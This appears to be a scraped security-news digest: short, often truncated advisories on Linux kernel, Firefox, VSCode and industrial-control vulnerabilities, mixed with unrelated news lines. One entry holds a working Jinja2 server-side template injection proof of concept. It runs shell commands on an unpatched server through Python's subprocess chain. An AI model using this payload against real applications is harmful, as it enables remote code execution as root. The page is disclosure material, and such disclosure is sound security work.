#web

The two jurisdictions will work together to investigate the credential-stuffing attack that put the personal data of millions at risk.

### Impact _What kind of vulnerability is it? Who is impacted?_ RCE via SSTI, as root, full takeover. ### Patches _Has the problem been patched? What versions should users upgrade to?_ It has not been patched. ### References _Are there any links users can visit to find out more?_ - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti ### POC Add the following to a document, upload and render it: ```jinja2 {% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }} whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }} uname -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }} {% endif %} ``` The index might be different, so to debug this first render a template with `...

Democratic leader Hakeem Jeffries has joined US intelligence officials in ignoring repeated inquiries about Israel’s “malign” efforts to covertly influence US voters.

It was discovered that the ATA over Ethernet (AoE) driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Various other issues were also addressed.

VSCode when opening a Jupyter notebook (.ipynb) file bypasses the trust model. On versions v1.4.0 through v1.71.1, its possible for the Jupyter notebook to embed HTML and javascript, which can then open new terminal windows within VSCode. Each of these new windows can then execute arbitrary code at startup. During testing, the first open of the Jupyter notebook resulted in pop-ups displaying errors of unable to find the payload exe file. The second attempt at opening the Jupyter notebook would result in successful execution. Successfully tested against VSCode 1.70.2 on Windows 10.

Red Hat Security Advisory 2024-3783-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.10. Issues addressed include bypass and use-after-free vulnerabilities.

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 8.4 ATTENTION: Exploitable remotely/low attack complexity Vendor: AVEVA Equipment: PI Web API Vulnerability: Deserialization of Untrusted Data 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to perform remote code execution. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of AVEVA PI Web API, a RESTful interface to the PI system, are affected: AVEVA PI Web API: Versions 2023 and prior 3.2 Vulnerability Overview 3.2.1 Deserialization of Untrusted Data CWE-502 There is a vulnerability in AVEVA PI Web API that could allow malicious code to execute on the PI Web API environment under the privileges of an interactive user that was socially engineered to use API XML import functionality with content supplied by an attacker. CVE-2024-3468 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.6 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L). A C...

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 7.0 ATTENTION: Low attack complexity Vendor: AVEVA Equipment: PI Asset Framework Client Vulnerability: Deserialization of Untrusted Data 2. RISK EVALUATION Successful exploitation of this vulnerability could allow malicious code execution. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of AVEVA PI Asset Framework Client, a tool to model either physical or logical objects, are affected: PI Asset Framework Client: 2023 PI Asset Framework Client: 2018 SP3 P04 and all prior 3.2 Vulnerability Overview 3.2.1 Deserialization of Untrusted Data CWE-502 There is a vulnerability in AVEVA PI Asset Framework Client that could allow malicious code to execute on the PI System Explorer environment under the privileges of an interactive user that was socially engineered to import XML supplied by an attacker. CVE-2024-3467 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.3 has been calculated; the CVSS vector string is (AV:L/A...

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 8.3 ATTENTION: Low attack complexity Vendor: Rockwell Automation Equipment: ControlLogix, GuardLogix, CompactLogix Vulnerability: Always-Incorrect Control Flow Implementation 2. RISK EVALUATION Successful exploitation of this vulnerability could compromise the availability of the device. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS Rockwell Automation reports that the following controllers are affected: ControlLogix 5580: V34.011 GuardLogix 5580: V34.011 1756-EN4: V4.001 CompactLogix 5380: V34.011 Compact GuardLogix 5380: V34.011 CompactLogix 5380: V34.011 ControlLogix 5580: V34.011 CompactLogix 5480: V34.011 3.2 Vulnerability Overview 3.2.1 Always-Incorrect Control Flow Implementation CWE-670 Rockwell Automation was made aware of a vulnerability that causes all affected controllers on the same network to result in a major nonrecoverable fault (MNRF/Assert). This vulnerability could be exploited by sending abnormal packets to the mDNS port. If explo...

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 10.0 ATTENTION: Exploitable remotely/low attack complexity Vendor: Intrado Equipment: 911 Emergency Gateway (EGW) Vulnerability: SQL Injection 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to execute malicious code, exfiltrate data, or manipulate the database. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Intrado's 911 Emergency Gateway are affected: 911 Emergency Gateway (EGW): All versions 3.2 Vulnerability Overview 3.2.1 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND ('SQL INJECTION') CWE-89 Intrado 911 Emergency Gateway login form is vulnerable to an unauthenticated blind time-based SQL injection, which may allow an attacker to execute malicious code, exfiltrate data, or manipulate the database. CVE-2024-1839 has been assigned to this vulnerability. A CVSS v3.1 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/...